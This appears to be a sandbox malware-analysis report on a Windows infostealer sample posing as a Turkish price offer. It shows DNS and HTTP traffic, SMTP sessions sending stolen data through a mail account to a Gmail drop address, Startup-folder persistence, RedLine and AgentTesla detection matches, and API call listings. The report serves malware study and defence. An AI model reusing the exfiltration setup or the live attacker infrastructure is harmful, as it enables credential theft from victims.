Apr 24, 2024 07:22:31.144357920 CEST	61226	53	192.168.2.6	1.1.1.1
Apr 24, 2024 07:22:32.156964064 CEST	61226	53	192.168.2.6	1.1.1.1
Apr 24, 2024 07:22:32.365029097 CEST	53	61226	1.1.1.1	192.168.2.6
Apr 24, 2024 07:22:32.365055084 CEST	53	61226	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 07:22:29.556003094 CEST	192.168.2.6	1.1.1.1	0x1e13	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:22:31.144357920 CEST	192.168.2.6	1.1.1.1	0xe1d0	Standard query (0)	mail.aquareklam.com	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:22:32.156964064 CEST	192.168.2.6	1.1.1.1	0xe1d0	Standard query (0)	mail.aquareklam.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 07:22:29.709443092 CEST	1.1.1.1	192.168.2.6	0x1e13	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:22:29.709443092 CEST	1.1.1.1	192.168.2.6	0x1e13	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:22:29.709443092 CEST	1.1.1.1	192.168.2.6	0x1e13	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:22:32.365029097 CEST	1.1.1.1	192.168.2.6	0xe1d0	No error (0)	mail.aquareklam.com	37.247.115.2	A (IP address)	IN (0x0001)	false
Apr 24, 2024 07:22:32.365055084 CEST	1.1.1.1	192.168.2.6	0xe1d0	No error (0)	mail.aquareklam.com	37.247.115.2	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49724	104.26.12.205	443	4852	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 05:22:30 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-24 05:22:30 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 05:22:30 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8793a7eb9f7a2b7e-LAX
2024-04-24 05:22:30 UTC	13	IN	Data Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 Data Ascii: 154.16.105.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49727	104.26.12.205	443	2540	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-24 05:22:41 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-04-24 05:22:41 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 24 Apr 2024 05:22:41 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8793a83118602f47-LAX
2024-04-24 05:22:41 UTC	13	IN	Data Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 Data Ascii: 154.16.105.36

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 24, 2024 07:22:33.013158083 CEST	587	49725	37.247.115.2	192.168.2.6	220 srv116.medyabim.com ESMTP Exim 4.96-58-g4e9ed49f8 Wed, 24 Apr 2024 08:20:53 +0300
Apr 24, 2024 07:22:33.013447046 CEST	49725	587	192.168.2.6	37.247.115.2	EHLO 124406
Apr 24, 2024 07:22:33.316807032 CEST	587	49725	37.247.115.2	192.168.2.6	250-srv116.medyabim.com Hello 124406 [154.16.105.36] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 24, 2024 07:22:33.317781925 CEST	49725	587	192.168.2.6	37.247.115.2	AUTH login aW5mb0BhcXVhcmVrbGFtLmNvbQ==
Apr 24, 2024 07:22:33.620573997 CEST	587	49725	37.247.115.2	192.168.2.6	334 UGFzc3dvcmQ6
Apr 24, 2024 07:22:33.933095932 CEST	587	49725	37.247.115.2	192.168.2.6	235 Authentication succeeded
Apr 24, 2024 07:22:33.933387041 CEST	49725	587	192.168.2.6	37.247.115.2	MAIL FROM:<info@aquareklam.com>
Apr 24, 2024 07:22:34.236073017 CEST	587	49725	37.247.115.2	192.168.2.6	250 OK
Apr 24, 2024 07:22:34.236295938 CEST	49725	587	192.168.2.6	37.247.115.2	RCPT TO:<kaykaykoko17@gmail.com>
Apr 24, 2024 07:22:34.591754913 CEST	587	49725	37.247.115.2	192.168.2.6	250 Accepted
Apr 24, 2024 07:22:34.592009068 CEST	49725	587	192.168.2.6	37.247.115.2	DATA
Apr 24, 2024 07:22:34.894957066 CEST	587	49725	37.247.115.2	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:22:34.895683050 CEST	49725	587	192.168.2.6	37.247.115.2	.
Apr 24, 2024 07:22:35.207439899 CEST	587	49725	37.247.115.2	192.168.2.6	250 OK id=1rzV3v-00EAWo-28
Apr 24, 2024 07:22:35.266123056 CEST	49725	587	192.168.2.6	37.247.115.2	QUIT
Apr 24, 2024 07:22:35.770392895 CEST	587	49725	37.247.115.2	192.168.2.6	221 srv116.medyabim.com closing connection
Apr 24, 2024 07:22:36.581536055 CEST	587	49726	37.247.115.2	192.168.2.6	220 srv116.medyabim.com ESMTP Exim 4.96-58-g4e9ed49f8 Wed, 24 Apr 2024 08:20:57 +0300
Apr 24, 2024 07:22:37.644454002 CEST	49726	587	192.168.2.6	37.247.115.2	EHLO 124406
Apr 24, 2024 07:22:37.953645945 CEST	587	49726	37.247.115.2	192.168.2.6	250-srv116.medyabim.com Hello 124406 [154.16.105.36] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 24, 2024 07:22:37.954040051 CEST	49726	587	192.168.2.6	37.247.115.2	AUTH login aW5mb0BhcXVhcmVrbGFtLmNvbQ==
Apr 24, 2024 07:22:38.260848045 CEST	587	49726	37.247.115.2	192.168.2.6	334 UGFzc3dvcmQ6
Apr 24, 2024 07:22:38.575443029 CEST	587	49726	37.247.115.2	192.168.2.6	235 Authentication succeeded
Apr 24, 2024 07:22:38.575647116 CEST	49726	587	192.168.2.6	37.247.115.2	MAIL FROM:<info@aquareklam.com>
Apr 24, 2024 07:22:38.882162094 CEST	587	49726	37.247.115.2	192.168.2.6	250 OK
Apr 24, 2024 07:22:38.882308006 CEST	49726	587	192.168.2.6	37.247.115.2	RCPT TO:<kaykaykoko17@gmail.com>
Apr 24, 2024 07:22:39.238259077 CEST	587	49726	37.247.115.2	192.168.2.6	250 Accepted
Apr 24, 2024 07:22:39.238473892 CEST	49726	587	192.168.2.6	37.247.115.2	DATA
Apr 24, 2024 07:22:39.546418905 CEST	587	49726	37.247.115.2	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:22:39.546724081 CEST	49726	587	192.168.2.6	37.247.115.2	.
Apr 24, 2024 07:22:39.863827944 CEST	587	49726	37.247.115.2	192.168.2.6	250 OK id=1rzV40-00EAX9-10
Apr 24, 2024 07:22:42.794444084 CEST	587	49728	37.247.115.2	192.168.2.6	220 srv116.medyabim.com ESMTP Exim 4.96-58-g4e9ed49f8 Wed, 24 Apr 2024 08:21:03 +0300
Apr 24, 2024 07:22:42.794764996 CEST	49728	587	192.168.2.6	37.247.115.2	EHLO 124406
Apr 24, 2024 07:22:43.102283001 CEST	587	49728	37.247.115.2	192.168.2.6	250-srv116.medyabim.com Hello 124406 [154.16.105.36] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 24, 2024 07:22:43.102674961 CEST	49728	587	192.168.2.6	37.247.115.2	AUTH login aW5mb0BhcXVhcmVrbGFtLmNvbQ==
Apr 24, 2024 07:22:43.409713984 CEST	587	49728	37.247.115.2	192.168.2.6	334 UGFzc3dvcmQ6
Apr 24, 2024 07:22:43.727371931 CEST	587	49728	37.247.115.2	192.168.2.6	235 Authentication succeeded
Apr 24, 2024 07:22:43.727730989 CEST	49728	587	192.168.2.6	37.247.115.2	MAIL FROM:<info@aquareklam.com>
Apr 24, 2024 07:22:44.034557104 CEST	587	49728	37.247.115.2	192.168.2.6	250 OK
Apr 24, 2024 07:22:44.034811974 CEST	49728	587	192.168.2.6	37.247.115.2	RCPT TO:<kaykaykoko17@gmail.com>
Apr 24, 2024 07:22:44.392299891 CEST	587	49728	37.247.115.2	192.168.2.6	250 Accepted
Apr 24, 2024 07:22:44.392625093 CEST	49728	587	192.168.2.6	37.247.115.2	DATA
Apr 24, 2024 07:22:44.699824095 CEST	587	49728	37.247.115.2	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:22:44.700544119 CEST	49728	587	192.168.2.6	37.247.115.2	.
Apr 24, 2024 07:22:45.016998053 CEST	587	49728	37.247.115.2	192.168.2.6	250 OK id=1rzV45-00EAXy-1U
Apr 24, 2024 07:22:45.034383059 CEST	49728	587	192.168.2.6	37.247.115.2	QUIT
Apr 24, 2024 07:22:45.542526960 CEST	587	49728	37.247.115.2	192.168.2.6	221 srv116.medyabim.com closing connection
Apr 24, 2024 07:22:46.198443890 CEST	587	49729	37.247.115.2	192.168.2.6	220 srv116.medyabim.com ESMTP Exim 4.96-58-g4e9ed49f8 Wed, 24 Apr 2024 08:21:06 +0300
Apr 24, 2024 07:22:46.198760986 CEST	49729	587	192.168.2.6	37.247.115.2	EHLO 124406
Apr 24, 2024 07:22:46.506078005 CEST	587	49729	37.247.115.2	192.168.2.6	250-srv116.medyabim.com Hello 124406 [154.16.105.36] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 24, 2024 07:22:46.506376028 CEST	49729	587	192.168.2.6	37.247.115.2	AUTH login aW5mb0BhcXVhcmVrbGFtLmNvbQ==
Apr 24, 2024 07:22:46.813333035 CEST	587	49729	37.247.115.2	192.168.2.6	334 UGFzc3dvcmQ6
Apr 24, 2024 07:22:47.128043890 CEST	587	49729	37.247.115.2	192.168.2.6	235 Authentication succeeded
Apr 24, 2024 07:22:47.128324032 CEST	49729	587	192.168.2.6	37.247.115.2	MAIL FROM:<info@aquareklam.com>
Apr 24, 2024 07:22:47.435302973 CEST	587	49729	37.247.115.2	192.168.2.6	250 OK
Apr 24, 2024 07:22:47.435672045 CEST	49729	587	192.168.2.6	37.247.115.2	RCPT TO:<kaykaykoko17@gmail.com>
Apr 24, 2024 07:22:47.787137985 CEST	587	49729	37.247.115.2	192.168.2.6	250 Accepted
Apr 24, 2024 07:22:47.787305117 CEST	49729	587	192.168.2.6	37.247.115.2	DATA
Apr 24, 2024 07:22:48.094044924 CEST	587	49729	37.247.115.2	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 24, 2024 07:22:48.094541073 CEST	49729	587	192.168.2.6	37.247.115.2	.
Apr 24, 2024 07:22:48.410304070 CEST	587	49729	37.247.115.2	192.168.2.6	250 OK id=1rzV48-00EAYh-2l

Target ID:	0
Start time:	07:19:46
Start date:	24/04/2024
Path:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"
Imagebase:	0x980000
File size:	1'210'368 bytes
MD5 hash:	47CC3BB8BB0427D4CE5DA71C2CF3702F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:22:26
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"
Imagebase:	0xfb0000
File size:	115'505'152 bytes
MD5 hash:	38F208E435D774A275ADA42C57F332FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.3720636618.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:22:27
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe"
Imagebase:	0x660000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.3833407043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3837231570.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.3838840579.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.3835842078.000000000270F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3837231570.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3837231570.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.3837117368.0000000002AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000007.00000002.3840117375.0000000005240000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:22:37
Start date:	24/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0x7ff6b8930000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:22:38
Start date:	24/04/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0xfb0000
File size:	115'505'152 bytes
MD5 hash:	38F208E435D774A275ADA42C57F332FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.3833226149.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:22:39
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0xff0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.4571149713.0000000003694000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.4571149713.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.4571149713.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.4571149713.00000000036BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	55

Executed Functions

Function 009842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0098430D

Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A

GetCurrentProcess.KERNEL32(?,00A1CB64,00000000,?,?), ref: 00984422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00984429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00984454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00984466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00984474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0098447B
GetSystemInfo.KERNEL32(?,?,?), ref: 009844A0

Strings

|O, xrefs: 009C36F8
GetNativeSystemInfo, xrefs: 00984460
kernel32.dll, xrefs: 0098444F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: fc97420d1b7fe941566ef820b6059a3e66487d6d04590a53ae1c73d25056773e
Instruction ID: a7f3b2edaddff4581508c78fa4031abf1fbf7012244f5d541d93ad510794f461
Opcode Fuzzy Hash: fc97420d1b7fe941566ef820b6059a3e66487d6d04590a53ae1c73d25056773e
Instruction Fuzzy Hash: 5AA1816190E3C1DFC791D7F9B8A17B57FE87F26366B08889DD0419BB22D224450BDB22

Uniqueness

Uniqueness Score: -1.00%

Function 009842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009850AA,?,?,00000000,00000000), ref: 009842B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009850AA,?,?,00000000,00000000), ref: 009842C9
LoadResource.KERNEL32(?,00000000,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20), ref: 009C35BE
SizeofResource.KERNEL32(?,00000000,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20), ref: 009C35D3
LockResource.KERNEL32(009850AA,?,?,009850AA,?,?,00000000,00000000,?,?,?,?,?,?,00984F20,?), ref: 009C35E6

Strings

SCRIPT, xrefs: 009842BF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: fbff5863f52f1426839a65224fc1f1a1ea73fb8c79b22aab6147a394f579019e
Instruction ID: 00ae363332aad2e73e4c5a76ebbc77ce8a94a154d11c1ed47845b750edbae52f
Opcode Fuzzy Hash: fbff5863f52f1426839a65224fc1f1a1ea73fb8c79b22aab6147a394f579019e
Instruction Fuzzy Hash: C511AC70244305BFD721ABA5DC48FA77BBDEFC9B65F108169B412C6290DB71D8008620

Uniqueness

Uniqueness Score: -1.00%

Function 009C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00982B6B

Part of subcall function 00983A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A51418,?,00982E7F,?,?,?,00000000), ref: 00983A78

Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00A42224), ref: 009C2C10
ShellExecuteW.SHELL32(00000000,?,?,00A42224), ref: 009C2C17

Strings

runas, xrefs: 009C2C0B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: f18b470166c10397c06ed8afc010704d61d570508902468dac83be15fd7c82e1
Instruction ID: 370878f3dff25d940e36025d373a077db1be4a1b3c62bd020ad7ea865eaffe4a
Opcode Fuzzy Hash: f18b470166c10397c06ed8afc010704d61d570508902468dac83be15fd7c82e1
Instruction Fuzzy Hash: DD11D371608301AAC704FF70E851FBEB7A8ABD2751F44982DF082572A3CF358A4A8712

Uniqueness

Uniqueness Score: -1.00%

Function 009EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,009C5222), ref: 009EDBCE
GetFileAttributesW.KERNELBASE(?), ref: 009EDBDD
FindFirstFileW.KERNELBASE(?,?), ref: 009EDBEE
FindClose.KERNEL32(00000000), ref: 009EDBFA

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 84afa12b2360a7ff756b09d1b8765c401b9a727bb25f3b7494dbd402a42ed21e
Instruction ID: b7efda5b5700189591479785b48ecacf29bd9b92956087609dffcb14d8393ccb
Opcode Fuzzy Hash: 84afa12b2360a7ff756b09d1b8765c401b9a727bb25f3b7494dbd402a42ed21e
Instruction Fuzzy Hash: CBF0E530851910A7C221BBBCAD0D8EA376C9E01374B208702F8B6C20F0FBB45D66C6D6

Uniqueness

Uniqueness Score: -1.00%

Function 0098D730 Relevance: 21.6, APIs: 14, Instructions: 619windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0098D807
timeGetTime.WINMM ref: 0098DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098DB28
TranslateMessage.USER32(?), ref: 0098DB7B
DispatchMessageW.USER32(?), ref: 0098DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098DB9F
Sleep.KERNEL32(0000000A), ref: 0098DBB1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
